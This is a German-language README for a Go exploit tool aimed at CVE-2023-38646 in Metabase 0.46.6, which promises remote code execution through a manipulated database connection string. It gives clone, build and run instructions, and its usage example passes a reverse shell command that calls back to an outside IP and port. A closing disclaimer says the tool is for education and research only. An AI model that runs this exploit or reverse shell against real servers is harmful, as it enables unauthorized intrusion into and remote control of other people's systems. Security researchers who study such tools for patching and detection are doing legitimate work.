
Exploit für CVE-2023-38646 in Metabase 0.46.6, der Remote-Codeausführung über manipulierte Anfragen und den Abruf von Setup-Tokens ermöglicht.
CVE-2023-38646 Metabase 0.46.6 Exploit
Dieses Tool nutzt eine Schwachstelle (CVE-2023-38646) in einer Softwareplattform aus. Der Exploit ermöglicht die Remote-Codeausführung über eine manipulierte Anfrage, indem eine fehlerhaft verarbeitete Datenbank-Verbindungszeichenfolge ausgenutzt wird.
Das Tool:
Repository klonen:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: Die URL der Plattform, die gescannt und ausgenutzt werden soll. COMMAND: Der Befehl, der auf dem Ziel ausgeführt werden soll. PROXY_URL (Optional): Die URL des Proxy-Servers (z. B. http://127.0.0.1:8080). Wenn nicht angegeben, wird kein Proxy verwendet.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Dieses Tool ist ausschließlich für Bildungs- und Forschungszwecke gedacht. Stellen Sie stets sicher, dass Sie über die entsprechende Autorisierung verfügen, bevor Sie ein Ziel scannen oder ausnutzen. Die missbräuchliche Verwendung dieses Tools widerspricht ausdrücklich der Absicht des Entwicklers und könnte illegal sein.
Zögern Sie nicht, Issues für Feedback, Fehler oder Feature-Anfragen zu eröffnen. Pull Requests sind jederzeit willkommen!